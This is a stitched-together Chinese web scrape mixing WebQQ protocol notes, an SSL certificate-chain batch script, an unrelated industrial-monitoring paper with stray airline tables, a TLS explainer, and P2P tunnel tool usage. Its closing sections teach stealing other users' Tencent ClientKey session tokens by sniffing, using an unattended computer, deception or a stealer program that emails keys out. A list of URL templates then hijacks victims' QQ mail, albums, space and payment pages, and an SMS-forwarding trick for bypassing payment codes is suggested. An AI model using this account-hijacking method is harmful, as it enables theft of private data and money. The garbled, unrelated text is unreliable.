0x02 0x03 源标志, 2字节,表示了这个包从何处来,主要用来标识客户端版本,如果其标识的是服务器,这个字段的具体用处还不清楚包命令, 2字节包序号, 2字节, 原则是保证短期内这个序号不要重复就可以,一般我们处理的时候都是递增,到最大再归00x02系列包主要完成一些基本任务,基本上处理了这个系列的包,QQ的功能就差不多了。
WebQQ协议分析——目录基于的协议分析告一段落,现在把命令汇总一下作为结束。
1、获取验证码与登录2、获取登录令牌3、获取用户资料,命令5c4、获取好友个性签名,命令675、获取好友分组组名,命令3c6、获取好友QQ号(包括群ID),命令587、获取好友资料,命令268、获取好友备注,命令3e9、获取群信息列表,命令30,子命令7210、获取群成员昵称,命令012611、获取群成员名片,命令30,子命令0f12、服务器发来的好友或群的聊天消息,命令1713、给好友发送聊天消息,命令1614、给群发送聊天消息,命令30,子命令0a作者用MFC写的基于的WebQQ机器人源代码下载地址:/source/27699821、WebQQ协议分析(1)——登录收藏绪:一直想弄个程序与QQ直接通信,再弄个聊天机器人什么的,困于无从下手:QQ太麻烦了,抓包来看看吧,全是乱码,没个能读通的,明显加过密,解密的难度也太大了。
好在出了个WebQQ,一切问题都解决了,因为浏览器要运行程序,得从服务器下载数据啊,也就是源代码了。
源代码都有了,还有什么不能解决的?在此,推荐一款抓包工具,Fiddler,英文版的,但太好用了,不得不推荐一下。
本系列文章针对的是WebQQ的version:1.1版本,网址:1、获取验证码用Web登录QQ时需要先打开,但我们用的是应用程序模拟浏览器登录,所以这一步是没有必要的,所以我们主要看看点击“登录”按钮时浏览器向服务器发送什么数据了。
Web登录QQ输入帐号输入焦点离开时,有时会提示要输入验证码,那么第一步就是要看看什么样的QQ号需要输入验证码。
GET /check?uin=1030196367&appid=1002101&r=0.8849248 “1030196367”是我测试用的QQ号,r的值是个随机数,写成固定的也行。
服务器返回“ptui_checkVC('0','!OMD');”括号里有两个被逗号隔开的单引号引着的数据,第一个值如果为0,则第二值为验证码,即不需要再从服务器获取验证码图片了,这个就是验证码了;第一个值如果不是1,则需要从服务器获取验证码图片,验证码需要根据图片人工输入。
这几天被SSL和证书搞得头昏脑胀的。
不过还好终于把这个SSL搞定了。
用SSL进行双向身份验证意思就是在客户机连接服务器时,链接双方都要对彼此的数字证书进行验证,保证这是经过授权的才能够连接(我们链接一般的SSL时采用的是单向验证,客户机只验证服务器的证书,服务器不验证客户机的证书。
而连接网上银行时使用的U盾就是用来存储进行双向验证所需要的客户端证书的)。
JDK里面内置了一个数字证书生产工具:keytool。
但是这个工具只能生成自签名的数字证书。
所谓自签名就是指证书只能保证自己是完整的,没有经过非法修改的。
但是无法保证这个证书是属于谁的。
其实用这种自签名的证书也是可以进行双向验证的(用keytool生成的自签名证书进行双向验证请看这里,向这位仁兄致意~:/stone2083/archive/2007/12/20/169015.html),但是这种验证有一个缺点:对于每一个要链接的服务器,都要保存一个证书的验证副本。
而且一旦服务器更换证书,所有客户端就需要重新部署这些副本。
对于比较大型的应用来说,这一点是不可接受的。
所以就需要证书链进行双向认证。
证书链是指对证书的签名又一个预先部署的,众所周知的签名方签名完成,这样每次需要验证证书时只要用这个公用的签名方的公钥进行验证就可以了。
比如我们使用的浏览器就保存了几个常用的CA_ROOT。
每次连接到网站时只要这个网站的证书是经过这些CA_ROOT签名过的。
就可以通过验证了。
但是这些共用的CA_ROOT的服务不是免费的。
而且价格不菲。
所以我们有必要自己生成一个CA_ROOT的密钥对,然后部署应用时,只要把这个CA_ROOT的私钥部署在所有节点就可以完成验证了。
要进行CA_ROOT的生成,需要OpenSSL(/)。
你也可以在/products/Win32OpenSSL.html找到Windows下的版本安装好OpenSSL以后就可以生成证书链了,我写了一个BAT解决这些东西:@echo offset Cset PWD_SERVER_KS=serverksset PWD_SERVER_KEY=serverkeyset PWD_CLIENT_KS=clientksset PWD_CLIENT_KEY=clientkeyif not exist ca.key (echo Generating a ca root key file...openssl req -new -x509 -keyout ca.key -out ca.crt -config %CONFIG%) else (echo ca.key already exists...)if not exist server.keystore (echo Generating server's private key...keytool -genkey -alias logon_server_private_key -validity 365 -keyalg RSA -keysize 1024-keystore server.keystore -keypass %PWD_SERVER_KEY% -storepass %PWD_SERVER_KS% ) else (echo server.keystore already exits...)if not exist client.keystore (echo Generating client's private key...keytool -genkey -alias ipclient_private_key -validity 365 -keyalg RSA -keysize 1024-keystore client.keystore -keypass %PWD_CLIENT_KEY% -storepass %PWD_CLIENT_KS% ) else (echo client.keystore already exits...)echo ========Finished key generation=========if not exist logon_server_private_key.csr (echo Generating server's singature request file...keytool -certreq -alias logon_server_private_key -sigalg MD5withRSA -filelogon_server_private_key.csr -keypass %PWD_SERVER_KEY%-storepass %PWD_SERVER_KS% -keystore server.keystore) else (echo logon_server_private_key.csr already exits...)if not exist ipclient_private_key.csr (echo Generating client's singature request file...keytool -certreq -alias ipclient_private_key -sigalg MD5withRSA -fileipclient_private_key.csr -keypass %PWD_CLIENT_KEY%-storepass %PWD_CLIENT_KS% -keystore client.keystore) else (echo ipclient_private_key.csr already exits...)if not exist logon_server_private_key.crt (openssl ca -in logon_server_private_key.csr -out logon_server_private_key.crt -cert ca.crt-keyfile ca.key -notext -config %CONFIG%) else (echo logon_server_private_key.crt already exits...)if not exist ipclient_private_key.crt (openssl ca -in ipclient_private_key.csr -out ipclient_private_key.crt -cert ca.crt -keyfile ca.key -notext -config %CONFIG%) else (echo ipclient_private_key.crt already exits...)echo =========Finished ca root signaturing==========echo Importing ca root certs into keystore...keytool -import -v -trustcacerts -alias ca_root -file ca.crt -storepass %PWD_SERVER_KS%-keystore server.keystorekeytool -import -v -trustcacerts -alias ca_root -file ca.crt -storepass %PWD_CLIENT_KS%-keystore client.keystoreecho Importing signatured keys...keytool -import -v -alias logon_server_private_key -file logon_server_private_key.crt-keypass %PWD_SERVER_KEY% -storepass %PWD_SERVER_KS% -keystore server.keystorekeytool -import -v -alias ipclient_private_key -fileipclient_private_key.crt -keypass %PWD_CLIENT_KEY% -storepass %PWD_CLIENT_KS% -keystore client.keystoreecho All done!运行这个批处理,期间需要回答一些问题,然后就可以得到一些文件其中client.keystore 是需要在客户端部署的,server.keystore是在服务器部署的。
link appraisement北京市应急管理信息中心陈银良(1989-)男,山西运城人,北京市应急管理信息中心干部,研究方向为信息管理与信息系统、物联网、监管科技、企业画像、大数据和机器学习。
本文针对危化品监管过程中难以实现快速发现和自动报警问题,提出一种基于工控协议和实时监测方法,并对危化品监安全生产风险监测预警系统的软件流程进行设计。
在应急管理监管领域实现了线上自动化监测。
图1 危化品安全生产风险监测预警系统框架图2 物联网网关硬件架构图图3 视频网关传输架构图图4 视频图像采集传输架构图通信卡实现双机之间的数据传输,数据流向为内网数据单向流向外网。
设计了专门的硬件看门狗实时监视系统状态,保证装置的稳定、可靠运行。
物联网网关的控制端与信息端主机分别运行嵌入式高性能工业通信软件。
控制端提供提供基本的设备数据采集,PLC,智能仪表,智能设备,各种标准协议(如Modbus,DNP,IEC-104,Bacnet,OPCClient实现对各种设备数据的接入。
息端主机提供数据服务,支持以标准协Modbus,DNP,IEC-104,Bacnet,OPCServer 等)将数据转发给第三方系统或各种数据库。
并提供一系列具有高高附加值的功能模块,如报警服务,存储系统,断线缓存,脚本引擎,触发器等。
视频网关接入设备视频网关传输架构如图3所示,视频网关接入设备分为企业端和汇总端两部分。
企业端设备负责接入企业本地视频设备包括硬盘录像机、存储等。
汇总端设备负责汇总所有企业端传输过来的视频。
企业端和汇总端设备为每个企业建立VPN通道,保证数据传输的保密性和稳定性。
采集终端(1)视频图像采集终端视频采集终端可使用业界主流品牌视频图像设备,如海康、大华等品牌产品,布设安装至相关位置。
企业前端摄像头将采集的视频图像传输至企业内部存储设备,通过中国科技信息2020年第17期·CHINA SCIENCE AND TECHNOLOGY INFORMATION Sep.2020◎31万~60万航段实际值模型值相对误差保山-郑州9.549.74 2.12%昆明-长沙9.859.62 2.25%长春-石家庄9.9310.08 1.51%海口-长治9.989.79 1.94%长沙-济南9.9910.080.87%长沙-石家庄10.029.88 1.34%保山-珠海10.039.950.80%腾冲-郑州10.1710.06 1.05%襄阳-昆明10.3810.54 1.60%宜昌-昆明10.4010.310.93%重庆-台州10.4210.420.02%长沙-太原10.4310.31 1.21%银川-昆明10.4310.55 1.12%昆明-郑州10.4810.69 2.02%昆明-深圳10.4910.24 2.39%长春-西安10.5610.72 1.55%广州-昆明10.6710.42 2.27%温州-昆明10.7110.87 1.47%济南-昆明10.7610.840.76%太原-厦门10.7910.65 1.35%徐州-哈尔滨11.0210.82 1.75%昆明-上海11.6811.790.97%表7 预估模型分月预测运用验证表月份实际值模型值相对误差2019年1月9.419.66 2.66%2019年2月9.509.78 2.88%2019年3月9.389.65 2.82%2019年4月9.739.820.90%2019年5月9.779.720.56%2019年6月9.789.700.82%2019年7月9.849.71 1.37%2019年8月9.869.67 1.89%2019年9月9.859.65 2.00%2019年10月9.759.740.13%2019年11月9.749.810.77%2019年12月9.719.97 2.69%2020年1月9.739.98 2.57%2020年2月9.969.960.01%2020年3月10.0610.160.94%2020年4月9.919.900.20%在实际工作中,若要使用此模型进行运行效率的预测,需要先评估航司当前航线结构和机队机型结构现状以及前后时期变化的情况,然后测算、修正模型的待定系数,确保预估模型对公司的可应用性和预测结果准确性,更好地为航空公司的生产计划工作给予科学的指导。
CA加密,网络安全HTTPS SSL--------安全传输协议SSL和TLS及WTLS的原理一、首先要澄清一下名字的混淆1.SSL(Secure Socket Layer)是Netscape公司设计的主要用于WEB的安全传输协议。
这种协议在WEB上获得了广泛的应用。
2.IETF将SSL作了标准化,即RFC2246,并将其称为TLS(Transport Layer Security),从技术上讲,TLS1.0与SSL3.0的差别非常微小。
由于本文中没有涉及两者间的细小差别,本文中这两个名字等价。
3.在WAP的环境下,由于手机及手持设备的处理和存储能力有限,Wap论坛在TLS的基础上做了简化,提出了WTLS协议(Wireless Transport Layer Security),以适应无线的特殊环境。
我们从各式各样的文章中得知,SSL可以用于保密的传输,这样我们与Web Server之间传输的消息便是“安全的”。
而这种“安全”究竟是怎么实现的,最终有能实现多大程度的保密?本文希望能用通俗的语言阐明其实现原理。
二、整体结构概览SSL是一个介于HTTP协议与TCP之间的一个可选层,其位置大致如下:---------| HTTP |---------| SSL |---------| TCP |---------| IP |---------如果利用SSL协议来访问网页,其步骤如下:用户:在浏览器的地址栏里输入https://HTTP层:将用户需求翻译成HTTP请求,如GET /index.htm HTTP/1.1Host SSL层:借助下层协议的的信道安全的协商出一份加密密钥,并用此密钥来加密HTTP请求。
TCP层:与web server的443端口建立连接,传递SSL处理后的数据。
接收端与此过程相反。
SSL在TCP之上建立了一个加密通道,通过这一层的数据经过了加密,因此达到保密的效果。
SSL协议分为两部分:Handshake Protocol和Record Protocol,。
[转]p2p端⼝映射⼯具dog-tunnel[转]p2p端⼝映射⼯具 dog-tunnel狗洞是⼀个⾼速的 P2P 端⼝映射⼯具,同时⽀持Socks5代理。
0.5版后开始开源,UDP底层基于开源库KCP重写,效率⼤⼤提⾼,在恶劣环境下优势明显。
同时提供⾮P2P版本(Lite版本),两端连接过程完全不依赖中间服务器,⽀持加密和登陆认证,⾃动重连,但是需要⼈为确保两端能正常连通(否则请使⽤默认的P2P版本)特性:数据安全,P2P模式通讯时数据不经过服务端,⽤户可⾃定义访问密码P2P模式底层采⽤KCP协议,在恶劣⽹络环境下⽐TCP延迟降低 30%-40%P2P模式⽀持AES加密P2P模式可以穿透80%的⽹络P2P模式失败时⾃动切换到C/S模式原⽣⽀持远端Socks5代理⽀持多洞模式,多连接时动态切换狗洞提⾼访问速度远端掉线⾃动重连开放Lite版本测试,完全点对点不依赖服务器,需要确保⼀⽅有公共IP,⾃动重连,加密,登录认证⽤途:可访问远程局域⽹的服务,例如HTTP,VNC远程控制,SSH等Socks5 反代理,公司内借助代理挂QQ,公司外访问公司内⽹站等等你发掘使⽤⽅法下载对应您系统的dtunnel客户端(Windows/Linux/Mac),序需要在狗洞两端运⾏,服务的⼀⽅叫远端,连接的⼀⽅叫近端远端:./dtunnel -reg name -local :80 -clientkey qwerty. reg:注册服务名,local:监听端⼝,填socks5则为socks5代理服务,clientkey:默认空,近端访问⽤的密码近端:./dtunnel -link name -local :8888 -clientkey qwerty. link:注册服务名,local:服务端⼝,⽤于近端其他应⽤连接,clientkey:默认空,要和远端⼀致近端:待出现service start success字样后代表狗洞准备就绪,请连接local指定的端⼝测试注意:对于多公⽹IP的终端,请⽤-stun参数指定stun服务器辅助连接,或者⽤-addip参数⼿⼯指定出⼝ip列表Lite版本使⽤⽅法下载对应您系统的dtunnel客户端(Windows/Linux/Mac),程序需要在狗洞两端运⾏,服务的⼀⽅叫远端,连接的⼀⽅叫近端远端:./dtunnel -service xxx:1234 -auth abcd -dnscache 10 . service:监听地址, -auth:验证密码,可以为空, -dnscache:dns缓存,分钟数(开启后加速效果显著)近端:./dtunnel -service xxx:1234 -local :8888 -auth abcd -encrypt -action ip:port. -service:服务器地址,-local:本地服务地址,-encrypt:是否加密,-action:控制远端⾏为,socks5表⽰开启代理服务,ip:port代表端⼝映射,-auth:密码,可留空,和服务端⼀致。
ClientKey基于目前微软公司流行的ACTIVEX技术开发,是专门用来增强网站会员帐号安全性的ACTIVEX控件。
当您的网站使用ClientKey控件后,网站会员的帐号将会与他们所使用的机器相互绑定,绑定后的帐号将不能在非绑定的机器上登陆网站,从而加强了会员帐号的安全性,同时也保护了网站的利益,避免了同一帐号被多人使用。
ClientKey支持Microsoft公司的WINDOWS系列操作系统(Windows 98、Windows 2000家族、Windows XP家族以及Windows 2003家族)。
同时应装有Microsoft Internet Explorer 6.0 SP1以上版本的浏览器,在安装了Microsoft Internet Explorer 6.0 SP1后,ClientKey也将同时支持其他使用Microsoft Internet Explorer 内核的第三方浏览器,如MYIE2、腾讯TT等。
由于ClientKey是基于Microsoft公司的ACTIVEX技术开发的WEB前台控件,故使用ClientKey 对网站的后台开发环境没有特殊要求,支持ASP、PHP、JSP、、CGI 等各种开发语言。
您可以非常方便的将ClientKey应用到您的网站中。
如果你的QQ是在线状态,那么你用IE内核的浏览器打开腾讯的相关产品登录页面(/或者等),那么会看到如下情况:它会自动检测登录,这种神奇的技术是clientkey,基于ACTIVEX技术开发(所以说必须在IE内核的浏览器上才能看见上面的效果)。
ClientKey是什么?ClientKey基于目前微软公司流行的ACTIVEX技术开发,是专门用来增强网站会员帐号安全性的ACTIVEX控件。
当您的网站使用ClientKey控件后,网站会员的帐号将会与他们所使用的机器相互绑定,绑定后的帐号将不能在非绑定的机器上登陆网站,从而加强了会员帐号的安全性,同时也保护了网站的利益,避免了同一帐号被多人使用。
腾讯产品的ClientKey,就是当你在客户端上点击如腾讯朋友,扣扣空间,腾讯微博之类的东西,会跳转到一个网页,在这跳转过程中,链接中的值包含用户账号以及Clientkey,例如点击腾讯朋友图标,打开的链接会是:/xiaoyou_clienttop?clientuin=523627970&clientkey=5912599 7A79E9E70969E799F6109787089636X2D7357124B9EF754**********F,这个ClienyKey就相当于密码,它不是密码,但它的密码的作用一样。
如何拿到ClientKey?很简单,登录QQ后断掉网,点击腾讯朋友的图标(其它的也行),弹出的网页地址栏的东西就是。
上面说的是拿到自己的ClientKey,要拿到别人的Clientkey就得你自己想办法了。
由于腾讯的大部分产品都没有使用SSL加密,你在中间用各种高端的嗅探技术是可以拿到的;趁别人不在,在她的电脑上点两下,拿到那个key也可以;花言巧语骗美女把那个地址复制粘贴给你也行。
总之只要你想,绝对拿的到。
拿到ClientKey能干什么?ClientKey和密码的作用一样,你说能干什么?能看加密QQ空间,加密的相册,能看QQMail (设置二次登录密码就不行了),腾讯朋友,腾讯微博,反正绝大多数腾讯的网页都可以以她的身份登录进去。
当然Tenpay是不行的,财付通应该和它没有共用一套鉴权。
再谈腾讯Clientkey腾讯服务器针对一个账号,一次分发一个Clientkey,但可以同时接收不同的Clientkey,处理方式都是当作合法用户登录。
Clientkey的有效时间应该在30分钟以上(我自己就测试了那么长时间),反正我觉得这么长时间是很危险的。
如果此Clientkey能够用到腾讯的手机财付通上面,那么你Tenpay里的余额与一点通绑定的银行卡里的钱消失,绝对不是没有可能。
你如果跟我提有个支付短信验证码的问题,那就多说几句,只要能够登录你的账户,短信验证码都是云。
具体操作如下:为手机里面放一个同步软件(s60的蜡笔同步,不要说这个很难,网秦飞流当年也上过好多手机),即时同步收到的短信,你的短信铃声还没响完,短信早已经同步网页上,人家输完验证码,估计你才打开短信,等你看完,钱已经没了。
关于财付通的安全问题,请看我昨天的文章《财付通安全性问题》。
当然这一块也是自己瞎想的,如果要真的操作起来,也得费点功夫。
但这些问题如果你真的忽视了,后果会很严重的。
毕竟很多人是想要搞死你腾讯。
要想解决这个问题,对于腾讯来讲真费不了多少。
花钱买平安,所有登录服务全部启用https;要不你就把那个ClientKey有效时间再放小一点或者干脆使用一次性ClientKey,我个人觉得这一点可能不好操作,时间太短或者使用一次性的ClientKey会严重影响用户体验,最直接的结果就是导致用户需要频繁登录。
不过腾讯是全中国人才储备最多的企业,发射个探月飞船都不是个小case,解决这个问题嘛,自然也不验。
PS:对于腾讯在微博和说说上的小动作,你的地盘你作主,我没什么好说的。
但作为国内最大的互联网企业,你丫肚量太小了。
盗取clientkey 破解QQ加密空间,QQ加密相册。
对于别人加密的QQ空间及相册,我们都十分有好奇心,也想尝试去破解,无奈网络上的那些办法都已过时,现在想破解出密码真是比登天还难。
那么现在有什么办法可以破解加密的QQ空间和相册呢?其实我们完全没必要去破解出密码,因为我们可以绕过加密,直接观看对方的QQ空间及相册里的内容。
我们只需要拿到对方的clientkey就可以了,在已经运行QQ的电脑上,运行自己的盗取clientkey程序,就会取clientkey发送到我们的邮箱里。
我们把整个网址复制到IE浏览器中打开,是不是已经绕过对方的密码直接进入到了空间中?OK,现在我们的权限和对方自己登录是一样的,我们可以删除、修改空间中的任意文章或图片。
此外,用这种方法我们还可以登录对方的QQ校友、MYQQ等服务,只要得到访问网址就可以了/showaccount?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey) (QQ邮箱)/qqshow?clientuin=(QQ号码)&clientkey=(clientkey)&opuin=(QQ号码)&ptlang=2052&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ秀)/jump?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u1=http%3A%2F%%2F(QQ号码)%3FADUIN=(QQ号码)%26ADSESSION=1254209494%26ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ空间)/client_jump?clickid=3&clientuin=(QQ号码)&touin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (拍拍卖家)/client_jump?clickid=6&clientuin=(QQ号码)&touin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (拍拍买家)/qqmail?Fun=clientread&ADUIN=(QQ号码)&ADSESSION=iii&ADTAG=jjj&clientuin=(QQ号码)&clientkey=(clientkey)&ptlang=2052&httptype=0&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_.0 (QQ邮箱)/clienturl_simp_16?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u2=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ交友)/clienturl_246?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ视频)/jump?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&u1=http%3A%2F%%2Fclienturl_97%3Fptlang=2052%26ownerid=(QQ号码)%26ADUIN=(QQ号码)%26ADSESSION=1254209494%26ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ 相册)/qqgodk.shtml?friqq=(QQ号码)&jp=4&clientuin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ滔滔)/clienturl_253?ptlang=2052&clientuin=(QQ号码)&clientkey=(clientkey)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (Q吧)/clienturl_tubiao?busid=15&clientuin=(QQ号码)&clientkey=(clientkey)(财付通)/client_to_paipai?clickid=156&clientuin=(QQ号码)&clientkey=(clientkey)&touin=(QQ号码)&level=0&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ充值)/goto.php?where=profile&groupcode=0&qq=(QQ号码)&p=99E9CA174D40564B5112E8E54E3477F43AB28DC487582427C9697243F79ADEFD8D2427362BA FA6D4&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ 校友)/clubclient?ptlang=2052&from=539&clientuin=(QQ号码)&clientkey=(clientkey)¶m=(QQ号码)&ADUIN=(QQ号码)&ADSESSION=1254209494&ADTAG=CLIENT.QQ.2515_MyTip.0 (QQ会员)将你获取的QQ号和权限码替换到以上链接就可任意使用其QQ号所有功能。